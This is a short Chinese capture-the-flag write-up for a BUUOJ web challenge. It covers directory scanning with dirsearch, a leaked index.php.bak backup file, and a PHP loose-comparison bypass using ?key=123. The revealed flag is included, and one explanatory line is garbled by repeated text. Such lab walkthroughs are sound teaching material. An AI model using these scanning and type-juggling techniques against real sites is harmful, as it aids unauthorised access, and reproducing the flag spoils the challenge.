0x00 考点
- PHP 弱类型比较
- -目录扫描
- 备份文件泄露
.rar
.zip
.7z
.tar.gz
.bak
.swp
.txt
.html
0x01 解题
御剑没扫出来
dirmap没扫出来
dirsearch扫出
😔 >﹏<
本着不放弃不抛弃的原则,多次努力摸索…
py -3 dirsearch.py -u http://841cf5e9-dc78-4845-8749-dee96e22f4a9.node3.buuoj.cn/ -e *
居然真的有??
index.php.bak
<?php
include_once "flag.php";
if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}
- $key GET传入数值
- is_numeric函数进行判断是否是数字,接着与 s t r 进 行 比 较 , str进行比较, str进行比较,str是一串字母和数字的字母串
- == PHP 弱类型比较,int和string无法直接比较,php会将string转换成int,然后再进行比较,
转换成int比较时只保留数字,第一个字符串之后的所有内容会被截掉
,str隐性的转换成整型123
?key=123
flag{8e6d4f8b-0f80-4ce7-9f70-0e7042267922}